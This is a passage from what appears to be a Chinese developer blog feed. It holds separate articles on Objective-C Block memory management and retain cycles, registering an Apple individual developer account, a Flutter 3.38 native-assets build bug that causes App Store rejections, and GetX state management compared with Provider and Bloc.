                NSLog((NSString *)&__NSConstantStringImpl__var_folders_d__csgptyg57sqczzwhcvq7mcpr0000gn_T_main_b8c0c1_mi_8,((NSUInteger (*)(id, SEL))(void *)objc_msgSend)((id)array, sel_registerName("count")));
     }
    
    //copy
    static void __main_block_copy_0(struct __main_block_impl_0*dst, struct __main_block_impl_0*src) {_Block_object_assign((void*)&dst->array, (void*)src->array, 3/*BLOCK_FIELD_IS_OBJECT*/);}
    
    //废弃
    static void __main_block_dispose_0(struct __main_block_impl_0*src) {_Block_object_dispose((void*)src->array, 3/*BLOCK_FIELD_IS_OBJECT*/);}
    
    //block描述
    static struct __main_block_desc_0 {
      size_t reserved;
      size_t Block_size;
      void (*copy)(struct __main_block_impl_0*, struct __main_block_impl_0*);
      void (*dispose)(struct __main_block_impl_0*);
    } __main_block_desc_0_DATA = { 0, sizeof(struct __main_block_impl_0), __main_block_copy_0, __main_block_dispose_0};
    
    //main方法
    int main(void) {
        {
            id array = ((NSMutableArray * _Nonnull (*)(id, SEL))(void *)objc_msgSend)((id)objc_getClass("NSMutableArray"), sel_registerName("array"));
            donyBck = (Blk_t)((id (*)(id, SEL))(void *)objc_msgSend)((id)((void (*)(id))&__main_block_impl_0((void *)__main_block_func_0, &__main_block_desc_0_DATA, array, 570425344)), sel_registerName("copy"));
        }
      
        //Block执行
        ((int (*)(__block_impl *, id))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck, ((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)objc_getClass("NSObject"), sel_registerName("alloc")), sel_registerName("init")));
        ((int (*)(__block_impl *, id))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck, ((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)objc_getClass("NSObject"), sel_registerName("alloc")), sel_registerName("init")));
        ((int (*)(__block_impl *, id))((__block_impl *)donyBck)->FuncPtr)((__block_impl *)donyBck, ((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)((NSObject *(*)(id, SEL))(void *)objc_msgSend)((id)objc_getClass("NSObject"), sel_registerName("alloc")), sel_registerName("init")));
        return 0;
    }
    
    
    

    通过源码可以看出 array被Block截获,并成为__strong修饰成员变量,这里虽然没有显示__strong,默认就是强引用

        //Block用的结构体
        struct __main_block_impl_0 {
          struct __block_impl impl;
          struct __main_block_desc_0* Desc;
          id array; //这里array被Block强引用 __strong
        };

那Block捕获的array是在什么时候进行初始化和废弃的呢?

我们可以从__main_block_desc_0可以看出结构体新增了copydispose,以及对应__main_block_copy_0__main_block_dispose_0,这两个结构体在3.3.2里__block时也遇到了。 不过__block修饰的变量和捕获的对象有一点点区别:

对象 BLOCK_FIELD_IS_OBJECT
__block变量 BLOCK_FIELD_IS_BYREF

仅仅主要用来区分是对象还是__block变量

   //block描述
   static struct __main_block_desc_0 {
     size_t reserved;
     size_t Block_size;
     void (*copy)(struct __main_block_impl_0*, struct __main_block_impl_0*);
     void (*dispose)(struct __main_block_impl_0*);
   } __main_block_desc_0_DATA = { 0, sizeof(struct __main_block_impl_0), __main_block_copy_0, __main_block_dispose_0};

   //copy
   static void __main_block_copy_0(struct __main_block_impl_0*dst, struct __main_block_impl_0*src) {
     //_Block_object_assign对使Block内部对array持有
     _Block_object_assign(
       (void*)&dst->array, 
       (void*)src->array, 
       3/*BLOCK_FIELD_IS_OBJECT*/
     );
   }

   //废弃
   static void __main_block_dispose_0(struct __main_block_impl_0*src) {
     _Block_object_dispose(
       (void*)src->array, 
       3/*BLOCK_FIELD_IS_OBJECT*/
     );
   }
  • __main_block_copy_0可以看出,内部通过_Block_object_assign方法对array持有,_Block_object_assign相当于retain,将对象赋值在对象类型结构体成员变量中。

  • __main_block_dispose_0使用_Block_object_dispose函数,相当于release,释放赋值在Block用结构体成员变量的array中的对象。

  • 因此_Block_object_assign__main_block_dispose_0指针赋值在__main_block_desc_0的copy和dispose中。

    但是在源代码里没有看到这些函数以及指针被调用,那他们的调用时机在什么时候?

    image-20251229下午84719431

那什么时候栈上的Block会复制到堆上呢?

  • 调用Block的copy实例方法时
  • Block作为函数返回值返回时
  • 将Block赋值给附有__strong修饰符id类型或Block类型成员变量时
  • 在方法名中含有usingBlock的Cocoa框架方法或GCD的API中传递Block时。

array默认为__strong修饰,那如果改为__weak呢?

typedef void (^Blk_t)(id obj);
Blk_t donyBck;

int main(void) {
    {
        id array = [NSMutableArray array];
        id __weak array2 = array;
        donyBck = [^(id obj){
            [array2 addObject:obj];
            NSLog(@"access local variables array.count:%lu",[array2 count]);
        } copy];
    }
    
    donyBck([[NSObject alloc]init]);
    donyBck([[NSObject alloc]init]);
    donyBck([[NSObject alloc]init]);
    return 0;
}
/**
access local variables array.count:0
access local variables array.count:0
access local variables array.count:0
*/

这是因为array在变量作用域结束后同时被释放、废弃。nil被赋值给__weak修饰的array2。

那如果__block__weak同时修饰呢?

__block id __weak array2 = array;

结果一样:

    access local variables array.count:0
    access local variables array.count:0
    access local variables array.count:0

即使被附加了__block说明符,__strong修饰符的变量array也会在变量作用域结束的同时被释放掉,nil被赋值给附有__weak的变量array2中。

另外被__unsafe_unretained修饰符的变量只不过与指针相同,所以不管在Block中使用还是附加到__block变量中,也不会想 __strong__weak那样进行处理,使用__unsafe_unretained修饰符需要注意不能通过悬垂指针访问已被废弃的对象。

__autoreleasing修饰符也不能和__block同时使用

3.8 Block循环引用

我们知道Block内部使用__strong修饰符的对象类型的自动变量,那当Block从栈复制到堆的时候,该对象就会被Block所持有

那么如果这个对象还同时持有Block的话,就容易发生循环引用。正所谓你中有我,我中有你

image-20251231上午100014948

  • 示例1:

    // 文件SDPerson.m
    typedef void (^blk_t)(void);
    @interface SDPerson()
    {
        blk_t blk_;
    }
    @end
    
    
    @implementation SDPerson
    
    - (instancetype)init
    {
        self = [super init];
        if (self) {
            blk_ = ^{
                NSLog(@"self = %@",self);
            };
        }
        return self;
    }
    
    - (void)dealloc{
        NSLog(@"dealloc");
    }
    
    //文件main.m
    #import "SDPerson.h"
    int main(void) {
        SDPerson *person = [[SDPerson alloc]init];
        NSLog(@"%@",person);
        return 0;
    }
    

    最终执行结果 <SDPerson: 0x60000020d340> SDPerson的dealloc没有执行,发生了Block的循环引用

    具体分析:

    SDPerson内部blk_t持有了self,而self也同时持有作为成员变量的blk_t

    另外编译器也会有提示

    image-20251231上午100056778

    如果Block内部不使用self,还会造成循环引用吗?

  • 示例2:

    typedef void (^blk_t)(void);
    @interface SDPerson()
    {
        blk_t blk_;
        id obj_;
    }
    @end
    
    
    @implementation SDPerson
    
    - (instancetype)init
    {
        self = [super init];
        if (self) {
            blk_ = ^{
                NSLog(@"obj_ = %@",obj_);
            };
        }
        return self;
    }
    

    答案:会

    分析一下:表面上看obj_没有使用self,但是它是self的成员变量,因此Block想持有obj_,就必须引用self,所以同样造成循环引用。

    那如果这个属性使用weak修饰符呢

  • 实例3 :

    typedef void (^blk_t)(void);
    @interface SDPerson()
    @property (nonatomic, weak) NSArray *array;
    @end
    
    - (instancetype)init
    {
        self = [super init];
        if (self) {
            blk_ = ^{
                NSLog(@"obj_ = %@",_array);
            };
        }
        return self;
    }
    

    答案:还是会循环引用,因为循环引用是self和block之间的事情,这个被block持有的成员变量是strong或weak没有关系,即使是基本类型assign也是一样的。

那如何解决这样的循环引用呢?

3.8.1 __weak修饰符

为了避免循环引用,可以通过__weak修饰符,来打破互相持有

- (instancetype)init
{
    self = [super init];
    if (self) {
      //使用__weak修饰符,使block内部为弱引用关系
        id __weak tmp = self;
        // id __unsafe_unretained tmp = self;
        blk_ = ^{
            NSLog(@"self = %@",tmp);
        };
    }
    return self;
}

常见用 __weak typeof(self) weakSelf = self; 来进行弱引用self

__weak typeof(self) weakSelf = self;
self.myBlock = ^{
    [weakSelf doSomething];
};

上述存存在一个问题,当block执行过程中,weakSelf可能被释放,导致后续操作无效

这里需要再block内部进行强化弱引用,使用__strong在局部作用域内临时强引用弱引用对象,确保在执行期间对象存活。__strong在Block内部栈上创建局部强指针,不会造成循环引用。

__weak typeof(self) weakSelf = self;
self.myBlock = ^{
    __strong typeof(self) strongSelf = weakSelf;
    if (strongSelf) {
        [strongSelf doSomething];
        [strongSelf doAnotherThing];
    }
};

除了__weak typeof(self) weakSelf = self; 这里还可以参考第三方开源库ReactiveObjC这样的简洁写法 @weakify(self); 作用是一样的,都是对self进行弱引用。

@weakify(self);
self.myBlock = ^{
@strongify(self);
    if (self) {
        [self doSomething];
        [self doAnotherThing];
    }
};

除了__weak修饰符外,还可以使用__unsafe_unretained,如id __unsafe_unretained tmp = self; 效果是一样的,都是使对象为弱引用,那两者有什么区别?更推荐使用__weak

两者的区别在于当所指向的对象被释放时,如何处理指针

  • __weak(安全)当对象释放后,所有指向它的__weak变量会被运行时自动设置为nil,意味着后续在访问这个指针,就像nil发送消息一样,在OC中是安全的,不会导致程序崩溃 。
  • __unsafe_unretained(不安全)当对象释放后,__unsafe_unretained指针不会自动置空,仍然保存着对象被释放前的那个内存地址,也就是变成了“悬垂指针”或“野指针”,如果此时访问了这个指针,就会发生BAD_ACCESS

image-20251231上午101006054

3.8.2 __block修饰符

除了__weak外,还可以使用 __block解决block循环引用问题

typedef void (^blk_t)(void);
@interface SDPerson()
{
    blk_t blk_;
}
@end
@implementation SDPerson

- (instancetype)init
{
    self = [super init];
    if (self) {
        __block id tmp = self;
        blk_ = ^{
            NSLog(@"obj_ = %@",tmp);
            tmp = nil;
        };
    }
    return self;
}

//执行block
- (void)execBlock{
    blk_();
}
int main(void) {
    SDPerson *person = [[SDPerson alloc]init];
    [person execBlock];
    NSLog(@"%@",person);
    return 0;
}
//执行结果
//obj_ = <SDPerson: 0x600000c08690>
//<SDPerson: 0x600000c08690>
//dealloc 

如果Block不执行execBlock,依然会存在循环引用

此时-SDPerson持有Block,Block持有__block变量,__block持有SDPerson类对象。三者互相持有,导致引用循环

image-20251231下午10424295

如何解决?

就是执行Block execBlock方法,Block内部,会把tmp置为nil。并执行block execBlock方法,因此__block持有类对象的强引用就失效了,

blk_ = ^{
     NSLog(@"obj_ = %@",tmp);
     tmp = nil;
};
//并执行block execBlock方法

image-20251231下午10913331

所以__block需要执行Block来解决循环引用,基于此特点,可以通过__block控制对象的持有时间。

这里需要区分,这里利用__block解决循环引用,不是因为__block本身直接解决的,而是利用了__block的**「可写特性」+ 手动执行 tmp = nil**,并执行block的execBlock方法,使block内部tmp=nil生效,从而主动打破了循环链。

在实际开发过程中,需要具体根据实际情况,来使用__weak还是__block.

四、常见面试题

4.1 说一下什么是Block?

Block是带有局部变量的匿名函数,本质是一个对象,内部有isa指针,内部是由结构体**__main_block_impl_0->__block_impl**组成,Block的执行函数通过在__block_impl->FuncPtr函数指针,找到封装的函数,并将block地址作为参数传给这个函数进行执行。Block捕获的变量,存入__main_block_impl_0结构体内,并通过block地址拿到捕获变量的值。

//包含block实际函数指针的结构体
struct __block_impl {
  void *isa; //有isa
  int Flags;
  int Reserved;  //今后升级所需区域大小
  void *FuncPtr; //函数指针
};

//block结构体
struct __main_block_impl_0 {
  struct __block_impl impl; //Block的实际指针,
  struct __main_block_desc_0* Desc;
};

4.2 Block 有几种类型?分别是什么?

有三种类型,分别为 _NSConcreteGlobalBlock_NSConcreteStackBlock_NSConcreteMallocBlock

定义在全局的block,为全局block,存储在数据区的全局区里,因为本身就是全局,所以不会访问局部变量,因此不需要捕获局部变量。

一般用到的是栈block,但是栈上的block是临时的,在它的作用域结束后就被销毁,为了延长生命周期,在arc下系统会默认会copy到堆上,来延迟生命周期,这样可以在定义它的作用域外部使用。mrc下,需要手动进行copy

4.3 Block 自动截取变量

Block外部的变量,可以被block捕获到内部进行使用,这里需要注意的是变量类型

  • 全局变量/静态全局变量 ,block不需要捕获,因为全局变量和静态全局变量数据存储在全局数据区,Block内部直接使用

  • 局部静态变量 捕获变量地址,所以外部变量修改后,通过地址访问到变量的值,也会跟着修改。

  • 静态变量 捕获变量的值,是通过值传递的方式捕获到block内部,并且捕获的是变量的当前瞬时值,所以外部修改了变量,block内部的变量值不会发生改变,如果需要修改,需要通过__block来修饰,然后通过指针引用传递的方式在内部使用。

    4.3.1 为什么普通局部变量要捕获值,跟静态局部变量一样捕获地址不行吗

    不行,和局部变量的生命周期有关系,因为局部变量在出大括号后就会被释放掉,这事我们在大括号外部调用这个Block,此时局部变量已经被释放了,block内部通过变量的指针访问变量,就会抛出异常。而静态局部变量的生命周期是和整个程序的生命周期一样,也就是在整个程序运行过程中不会释放,所以可以通过指针地址访问。

    4.3.2既然静态局部变量一直都不会被释放,那block为什么还要捕获它,直接拿来用不就可以了吗?

    这是因为静态局部变量作用域只在大括号内,出了括号,它虽然存在,但外面已经访问不了,这时通过block执行函数只能通过捕获的方式。

    4.3.3 静态局部变量一直都不会被释放,会导致内存泄漏吗?

    不会,静态局部变量是语言设计的特性,行为可预测,是一种特殊的局部变量,具有局部作用域,存储在数据区.data(初始化).bss(未初始化),程序在运行期间只被分配一次内存(且占内存有限),生命周期有编译器自动管理,启动时初始化,结束时销毁,不会导致运行时的内存泄漏

    首先明确内存泄漏的概念:程序在运行过程中,不断分配内存而没有适当的释放,导致内存逐渐减少的情况

4.4Block 处理循环引用

如果Block内部捕获了外部的strong(强引用)类型的引用对象,那么这个对象有强引用block,就会形成循环引用,会导致内存泄漏,因为参与循环引用的对象和block无法正常释放,长期下去会导致性能问题。

这时,就需要通过__weak关键字,进行对强引用对象进行弱引用,来打破你中有我,我中有你。

4.4.1 __weak typeof(self) weakSelf = self; 和@weakify(self);有什么区别

都是用来弱引用self,避免循环引用,__weak typeof(self) weakSelf = self;

@weakify(self) 是宏定义,预编译阶段展开就是 __weak typeof(self) weakSelf = self;,设计初衷就是为了更简洁更优雅。

4.5 Block 的内存管理

首先围绕Block的三个核心点

4.6__block 的解释以及在 ARCMRC 下有什么不同

默认情况下,Block捕获的外部自动变量(局部变量)是值捕获,在Block内部是无法修改的。

__block是修饰符,主要用于解决上述问题,block捕获的局部变量,在block内部,可以进行修改。

原理:被__block修饰后的局部变量,编译器会把这个变量包装成一个结构体对象,底层其实一个结构体__Block_byref_a_0,内部有一个__forwarding指针,和当前变量的值等成员,无论Block和__block变量本身被复制到栈上还是堆上,都可以通过这个指针访问和修改值,这样就使从值传递变成了引用传递

在ARC和MRC下的不同

  • 在ARC下

__block修饰的对象是强引用,需要注意循环引用,常用的解决方案为使用__weak弱引用。

  • 在MRC下

对__block修饰对象,不会对对象进行retain,避免循环引用

4.7为什么需要使用copy关键字

Block默认创建在栈上,为了延迟生命周期,需要copy到堆上。

在arc之前,手动管理内存,为了保持block的生命周期,开发者需要手动将栈上的block复制到堆上,通过copy关键字操作,如下

@property (copy, nonatomic) void (^block)(void);

在ARC之后,虽然编译器会自动进行copy操作,把block复制到堆上,为了和MRC下保持一致,避免在不同内存管理环境下切换的混淆,在ARC之后,还是推荐用copy关键字

4.7.1 那用strong可以修饰block吗?

在ARC下可以,在MRC下不可以。

4.7Dispatch_block_t这个有没有用过?解释一下?

dispatch_block_t是GCD中的一个类型定义,代表无参数,也没有返回值的代码里。

基本定义 typedef void (^dispatch_block_t)(void);

常见的使用场景:将任务放入队列后立即返回,不阻塞当前线程

    dispatch_async(queue,^{
    NSLog(@"在后台执行任务");
    })

五、参考文献

注册苹果个人开发者账号,千万别换设备!!!

记录一下我最近注册个人开发者账号的经历,前后历时2周,换了3个个人身份,废了两台新买的测试机。西天取经,九九八十一难,各种问题,全靠猜,联系苹果也是模棱两可,等几天最后告诉你,你的账号废了,你的设备废了,请换新的!!难度堪比提审遇到账号调查。

先说结论:
1、(非常重要)注册过程中千万不要换设备,不要换账号。遇到任何问题联系苹果解决。如果你把账号换到别的设备上尝试注册,那你这个账号和这两台设备大概率会被风控。你的这个账号和这“两台”设备就废了,无法继续用于注册了。
2、填个人信息地址时要填对,最好填身份证上的地址(这是联系苹果时,苹果告诉我的)。我猜苹果会校验的地址,比如地址是否有效,是否完整,是否精确到门牌号等。瞎填或者填的不完整是过不了的,会提示“如果要继续注册,请联系苹果”。

3、一个身份证只能注册一个个人开发者账号。即使这个身份证之前注册流程没走完,也算使用过了。无法使用新的AppleID绑定这个身份证重新注册。只能用原来的AppleID继续绑定注册

在和苹果技术支持沟通过程中,苹果工作人员提到官方文档中明确写明了,注册过程中不能更换设备。为此,我专门去查了一下官方文档。苹果官方文档,确实有提到“你必须在整个注册流程中使用相同的设备”,无论是注册个人账号还是公司账号。 图片.png


下面是我这次注册的经历,当时没想到注册个人账号这么复杂,这么多坑。下面是没有任何心眼下的小白操作。

我这边有个新项目,需要注册一个新的个人开发者账号。我顺便买了两部新测试手机(手机1、手机2)。

1、小H注册
最开始找到同事小H注册。小H重新注册了一个新的AppleID,使用手机1,下载Developer App去注册,到填街道地址那一步卡住了,提交报错,具体什么错不记得了。联系苹果,苹果说小H的身份信息以前注册过开发者账号,请使用以前的账号继续注册或登录图片.png

由于时间太久了小H也不记得以前是否注册过了,也不记得是哪个账号了。我们又联系苹果说我们不记得账号了,能否申请用新的账号注册苹果回信说,“不可以,请回忆之前的账号或者使用公司其他人的身份注册”。我们把小H所有有可能的AppleID通过找回密码都试了一遍,都是AppleID不存在。放弃。 图片.png

2、小L注册
我又找到同事小L。小L新注册了一个AppleID,使用手机1,用Developer App去注册。到了填街道页面,小L把街道和详细地址填的很简略,提交后报错“Action not allowed”。网上查资料说设备可能被风控了,可以换个设备尝试。于是,我换了另一个新买的测试手机2,结果账号登录后,“现在注册”按钮是置灰的,无法点击。(我们没有联系苹果,自己瞎摸索后)在苹果后台找到了网页注册入口,点进去上传了身份证。第二天,苹果邮件通知我们身份信息校验通过可以继续注册了。Developer App的注册按钮恢复正常了,还是在街道页面,街道和详细地址填的很简略,提交报“Action not allowed”。

联系苹果,苹果问我们注册过程中是否换过设备,我说换过。苹果告诉我,注册条款里有明确说明,注册的时候不能换设备我说我不知道有这个条款,能不能帮我把设备重置一下。苹果说她没有权限,帮我连线资深顾问。资深顾问说她帮我联系中国的运营团队。等了2天,收到苹果邮件:“由于一个或多个原因,你无法完成Apple Developer Program的注册。我们目前无法继续处理你的注册申请。”再次放弃。 图片.png

至此,我们的两个账号、两个身份、两台设备都废了!

3、小X注册
没办法只能再换人换设备了,这次长教训了,直接用小X的私人手机注册。用小X身份新注册一个AppleID(因为用私人AppleID后续不方便),在他私人手机上下载了Developer App进行注册。前面还算顺利,直到填写街道那一步,提交后弹窗提示“请联系苹果支持”。登录苹果开发者网站 - 联系我们 - 账号注册 - 电话沟通。苹果告诉我们街道地址填的有问题,最好填身份证上的地址,这样大概率是没问题的图片.png Developer App上改为填小X身份证地址后果然可以到下一步了,后续就交钱了。交完钱并不代表你注册成功了第二天收到苹果的邮件,让我们上传身份证。通过邮件链接打开苹果网站,上传身份证正面照片。 图片.png 上传后收到苹果回复邮件,说两个工作日审核完毕。实际上还挺快的半天就审核完了,下午我们就收到了开发者账号注册成功的邮件。 图片.png

总算是注册成功了。

划重点:

  • 确保使用未曾注册过(旧测试机就不要用了,否则还浪费身份证名额);
  • 注册过程中千万不要换设备,遇到任何问题联系苹果解决;
  • 街道地址填身份证地址。

最后,祝大家注册顺利,少踩坑。

Flutter 3.38.1 之后,因为某些框架低级错误导致提交 Store 被拒

如果你近期已经升级到 3.38.1 之后的版本,包括 3.38.5 ,你就有概率发现,打包提交 iOS 的包会出现 The binary is invalid 的相关错误,简单来说,就是App Store 拒绝了某个二进制文件,因为它包含了无效的内容

那么这个内容是怎么来的?大概率是模拟器架构的 Framework 被错误地打包进了正式发布的 App ,具体原因还要提到最新版本增加的 Native Assets 功能。

Native Assets 的目标是让在 Flutter/Dart 包中集成 C、C++、Rust 或 Go 代码,可以像集成普通 Dart 包一样简单,也就是它允许 Dart 包定义如何构建和打包原生代码,开发者不需要深入了解每个平台的底层构建系统,也是 Dart FFI 未来的重要基建。

详细可见:《Flutter 里的 Asset Transformer 和 Hooks ,这个实验性功能有什么用》

那它怎么导致了这次这个低级问题的出现?实际上这是一个构建脚本逻辑缺陷导致的“脏构建”问题,当 Flutter 构建依赖于 Native Assets(比如 sqlite3 等库)的 Plugin 时,这些原生资源会被编译并输出到 build/native_assets/$platform 目录(例如 build/native_assets/ios)。

因为在现有的构建脚本(xcode_backend.dart)在打包时,会简单粗暴地将 build/native_assets/ios 目录下的所有框架复制到最终的 App Bundle (Runner.app/Frameworks) ,例如:

  • 先运行了模拟器跑应用,这时模拟器专用的框架(如 sqlite3arm64ios_sim.framework)就会被生成并留在了 build/native_assets/ios 目录
  • 接着,开发者在没有运行 flutter clean 的情况下,直接运行了 Release 构建
  • 构建脚本会把之前遗留的“模拟器框架”也一并复制进了 Release 包
  • App Store 检测到 Release 包中含有模拟器架构的代码,因此拒绝接收

所以说,大厂也有大厂的草台。

当然,这个问题解决起来也很简单,就是发布前 flutter clean 清理一下,当然,如果你之前打过包了,那么 Xcode 的构建缓存也需要清理下,因为可能存在即使你通过 flutter clean 删除了 Flutter 的构建产物,但是 Xcode 可能仍然认为某些中间文件(Intermediate Build Files)存在可用。

比如 DerivedData 缓存

那么这么低级的问题,修复下也很简单,所以 sqlite3 的作者也提交了一个 #179251 ,简单来说就是,针对 Native Assets :

  • 读取构建过程中生成的 native_assets.json 文件
  • 解析文件,获取当前构建真正引用的依赖列表
  • 仅复制 native_assets.json 中列出的框架,忽略目录中残留的其他无关文件(如模拟器文件)

这个修复其实很简单,但是在流程上,因为目前 PR 还缺少 integration test ,所以一直卡在了等待 Review 阶段,除非有人申请豁免,不然这个 PR 的合并还会继续卡着。

只能说,一代人有一代人的草台。

参考链接

GetX 状态管理详解

一、 GetX 状态管理核心机制

GetX 的状态管理并非单一方案,而是提供了三种核心状态管理模式,兼顾简洁性和灵活性,适配不同业务场景,其核心设计围绕「轻量、无侵入、响应式」展开。

1. 简单状态管理(GetBuilder:非响应式)

适用于简单的状态更新场景(如按钮点击刷新文本、列表局部更新),基于手动触发重建实现,无响应式依赖,性能开销极低。

  • 核心原理:
    1. 定义 Controller 继承 GetxController,在控制器中维护状态变量,并提供状态更新方法。
    2. 通过 update() 方法手动标记状态变更,通知对应的 GetBuilder 进行组件重建。
    3. GetBuilder 关联指定控制器,仅在收到 update() 通知时刷新自身布局,不影响其他组件。
  • 代码示例:
// 1. 定义控制器
class CountController extends GetxController {
  int count = 0;

  void increment() {
    count++;
    update(); // 手动触发状态更新
  }
}

// 2. 在UI中使用
Widget build(BuildContext context) {
  // 无需手动初始化控制器,GetX自动管理生命周期
  return GetBuilder<CountController>(
    builder: (controller) {
      return Column(
        children: [
          Text("计数:${controller.count}"),
          ElevatedButton(
            onPressed: controller.increment,
            child: const Text("点击增加"),
          ),
        ],
      );
    },
  );
}

2. 响应式状态管理(GetX / Obx:自动响应式)

适用于复杂状态依赖场景(如网络请求结果刷新、多组件共享状态、实时数据同步),基于Dart 扩展方法+观察者模式实现,无需手动调用 update(),状态变更自动触发 UI 重建。

  • 核心原理:
    1. 状态变量通过 .obs 扩展方法转化为「可观察对象(Observable)」,GetX 会监听该对象的所有变更。
    2. 使用 Obx(或 GetX)包裹需要响应状态变更的 UI 组件,Obx 作为观察者,订阅可观察对象的状态变化。
    3. 当可观察对象的值发生改变时,会自动通知所有订阅它的 Obx 组件,触发局部重建,无需全局刷新。
  • 核心特性:
    • 无需继承 GetxController(可直接使用全局变量,也可结合控制器管理)。
    • 支持多种数据类型:基本类型(int/string/bool)、集合类型(List/Map/Set)、自定义对象。
    • 局部重建:仅 Obx 包裹的组件会重建,性能优于全局状态刷新。
  • 代码示例:
// 1. 定义响应式状态(两种方式:直接使用 / 结合控制器)
// 方式1:直接使用全局响应式变量
var userName = "张三".obs;

// 方式2:结合控制器管理(推荐,便于状态统一维护)
class UserController extends GetxController {
  var userAge = 20.obs;
  var userInfo = UserModel(name: "李四", age: 25).obs; // 自定义对象

  void updateAge() {
    userAge.value++; // 注意:基本类型响应式变量需通过 .value 访问/修改
    userInfo.update((info) { // 自定义对象批量更新
      info?.age = userAge.value;
    });
  }
}

// 2. 在UI中使用 Obx 监听
Widget build(BuildContext context) {
  final userController = Get.put(UserController()); // 初始化控制器(单例)
  return Column(
    children: [
      Obx(() => Text("用户名:${userName.value}")),
      Obx(() => Text("用户年龄:${userController.userAge.value}")),
      Obx(() => Text("自定义对象年龄:${userController.userInfo.value.age}")),
      ElevatedButton(
        onPressed: () {
          userName.value = "王五"; // 自动触发UI刷新
          userController.updateAge(); // 控制器内状态变更,自动刷新
        },
        child: const Text("更新状态"),
      ),
    ],
  );
}

3. 依赖注入式状态管理(Get.put / Get.find:生命周期管理)

GetX 状态管理的核心支撑能力,通过内置依赖注入(DI)容器管理控制器生命周期,无需手动创建和销毁控制器,实现状态的全局共享或局部共享。

  • 核心原理:
    1. Get.put(Controller()):将控制器实例存入 GetX 的 DI 容器,默认全局单例,可指定 tag 实现多实例,或指定 permanent: false 实现自动销毁。
    2. Get.find<Controller>():从 DI 容器中获取已存入的控制器实例,无需跨组件传递。
    3. 生命周期绑定:控制器继承 GetxController 后,可重写 onInit()onReady()onClose() 方法,对应组件的初始化、就绪、销毁生命周期,自动执行。
  • 核心特性:
    • 无需 InheritedWidget 包裹(对比 Provider),无组件嵌套冗余。
    • 支持局部状态:通过 Get.create() 或在路由中传入 binding,实现路由级别的局部状态,路由销毁时自动销毁控制器。

二、 GetX 与 Provider、Bloc 的核心对比

1. 核心设计差异

特性 GetX Provider Bloc
状态管理模式 支持3种模式(GetBuilder/Obx/DI),兼顾简单与复杂场景 单一响应式模式(基于InheritedWidget + ChangeNotifier) 单一事件驱动模式(基于Stream + Event/State分离)
核心依赖 无额外依赖(GetX自身集成) 依赖 provider 包(基于Flutter原生组件) 依赖 bloc/flutter_bloc 包(基于Dart Stream)
组件侵入性 极低(无需顶层包裹,可按需使用Obx/GetBuilder) 较高(需顶层包裹 MultiProvider,子组件需 Consumer/Provider.of 较高(需 BlocProvider 包裹,子组件需 BlocBuilder/BlocConsumer
状态传递方式 依赖注入(Get.find),无需跨组件层层传递 基于InheritedWidget,自上而下跨组件传递 依赖注入(BlocProvider)+ Stream监听,自上而下传递
事件处理方式 灵活(可直接调用方法,也可自定义事件) 简单(调用ChangeNotifier的更新方法) 严格(Event入参 → Bloc处理 → State输出,单向数据流)

2. GetX 的优势

(1) 极致简洁,开发效率极高

  • 代码量极少:无需编写大量模板代码(对比 Bloc 的 Event/State/Bloc 三层模板,Provider 的 ChangeNotifier 子类+Consumer 包裹),大幅减少冗余代码。
    • 示例:实现一个计数功能,GetX 只需 10 行左右代码,Bloc 需编写 Event(CountIncrementEvent)、State(CountState)、Bloc(CountBloc)三层代码,代码量增加 3-5 倍。
  • 无嵌套地狱:无需顶层包裹 MultiProvider/MultiBlocProvider,解决了 Provider/Bloc 中多层嵌套导致的代码可读性差的问题。
  • 无需上下文(Context):通过 Get.find() 可在任意位置获取控制器,无需传递 BuildContext,尤其在工具类、网络请求类中使用便捷。

(2) 功能全面,一站式解决方案

  • 状态管理 + 路由管理 + 依赖注入 + 国际化 + 主题管理:GetX 并非单一状态管理库,而是集成了 Flutter 开发所需的核心功能,无需引入多个第三方库(如 Provider 需配合 flutter_routeget_it 实现路由和DI),减少库之间的兼容性问题。
  • 灵活适配场景:简单场景用 GetBuilder(性能最优),复杂场景用 Obx(自动响应式),全局共享用 Get.put(单例),局部共享用路由 Binding(自动销毁),适配所有业务场景。

(3) 性能更优,资源开销更低

  • 局部重建更精准:Obx/GetBuilder 仅刷新自身包裹的组件,且无需遍历 InheritedWidget 树(对比 Provider),减少了布局遍历的性能开销。
  • 控制器自动销毁:GetX 可根据路由生命周期自动销毁控制器(permanent: false),避免 Provider/Bloc 中手动管理控制器生命周期导致的内存泄漏问题。
  • 无 Stream 额外开销:GetX 的响应式状态管理基于自定义 Observable,无需像 Bloc 那样依赖 Stream 流处理,减少了 Stream 订阅/取消订阅的性能开销。

(4) 学习成本更低

  • 无需掌握 Stream 原理:Bloc 强依赖 Dart Stream 知识,对于新手而言,学习成本较高;GetX 无需了解 Stream,只需掌握 .obsObx 的使用,即可快速上手。
  • API 设计简洁直观:GetX 的 API 命名清晰(如 Get.put、Get.find、update、Obx),符合开发者的使用习惯,无需记忆复杂的 API 结构。

3. GetX 的劣势

(1) 状态管理过于灵活,团队协作易出规范问题

  • 由于 GetX 支持全局响应式变量(无需控制器)、控制器管理状态、局部状态等多种方式,若团队无统一开发规范,容易出现状态分散、难以维护的问题(如部分状态在全局变量中,部分在控制器中,排查问题时难以定位)。
  • 对比 Bloc:Bloc 的 Event/State 严格分离,强制遵循单向数据流,团队协作时规范统一,即使是大型项目,状态流转也清晰可追溯;Provider 虽灵活,但依赖 InheritedWidget,状态范围相对明确。

(2) 生态成熟度略低于 Provider、Bloc

  • Provider:作为 Flutter 生态中最早的状态管理库之一,几乎被所有 Flutter 开发者熟知,相关教程、插件、问题解决方案极为丰富,且与 Flutter 原生组件深度兼容。
  • Bloc:由 Google 团队成员参与维护,生态成熟,支持 bloc_test(单元测试)、flutter_bloc(Flutter 适配)、bloc_concurrency(并发处理)等周边库,在大型企业级项目中应用广泛。
  • GetX:生态虽在快速发展,但相比 Provider、Bloc,部分小众场景的解决方案较少,且第三方插件对 GetX 的适配度略低。

(3) 不适用于对状态流转有严格要求的大型项目

  • 对于金融、电商等大型企业级项目,状态流转的可追溯性、可测试性要求极高:
    • Bloc 的 Event/State 分离模式,每一次状态变更都对应一个明确的 Event,可通过 bloc_test 轻松编写单元测试,且能通过 DevTools 追踪状态流转过程,便于问题排查。
